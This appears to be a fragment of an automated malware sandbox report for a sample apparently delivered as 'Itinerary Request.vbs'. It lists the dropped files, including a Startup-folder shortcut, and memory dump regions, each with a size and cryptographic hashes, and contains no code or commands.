a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Itinerary Request.vbs:SmartScreen

Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfgajdat.kcr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk

Filesize
1KB

MD5
23704b2b6b94a9b3b4c0588091f7277e

SHA1
d45d3c89feb343b389583856d93c188cead8eead

SHA256
3e7f5b981f239a77915971de87d04466b52bfe73910a3457cc408c0eb00ea1a1

SHA512
32e69d9245167fc8a46258459c64ab0f6179b4e37e6200554c1b980dafbf920954c6c02e47f414bbecef653b6e67210f4fb9cd38d4185f82d917a46b30c427e8

Download Submit
C:\Users\Admin\Downloads\未確認 162207.crdownload

Filesize
2.2MB

MD5
7c8ec6d3b17d8a2e00463af73a08d645

SHA1
f4be8c2ecb3d50ba991829666aba948b1dea6adb

SHA256
5d6857e96b0abb2b2e9f049a2351f3f02291989c2da1fcd51b3ab846eb579456

SHA512
0916d7aeacd0ad5b0535099c5e49b930754a547f8b1e184d07b3b876d538aaafa7c547e31d36a2a912ddb9d76121d0a6d1589830ee44f80f38db29b607cabab7

Download Submit
memory/2180-242-0x0000000005D80000-0x0000000005DE6000-memory.dmp

Filesize
408KB

Download
memory/2180-192-0x0000000005540000-0x00000000055DC000-memory.dmp

Filesize
624KB

Download
memory/2180-186-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2180-249-0x00000000061D0000-0x00000000062DE000-memory.dmp

Filesize
1.1MB

Download
memory/2180-335-0x0000000006B00000-0x0000000006B92000-memory.dmp

Filesize
584KB

Download
memory/2180-336-0x0000000007150000-0x00000000076F4000-memory.dmp

Filesize
5.6MB

Download
memory/2440-185-0x00000255617F0000-0x00000255617FA000-memory.dmp

Filesize
40KB

Download
memory/2440-170-0x0000025549610000-0x0000025549618000-memory.dmp

Filesize
32KB

Download
memory/3548-151-0x00000242EBB30000-0x00000242EBC3E000-memory.dmp

Filesize
1.1MB

Download
memory/3548-150-0x00000242EB5E0000-0x00000242EB5F0000-memory.dmp

Filesize
64KB

Download
memory/3548-145-0x00000242EB610000-0x00000242EB632000-memory.dmp

Filesize
136KB

Download
memory/3548-139-0x00000242EB680000-0x00000242EB712000-memory.dmp

Filesize
584KB

Download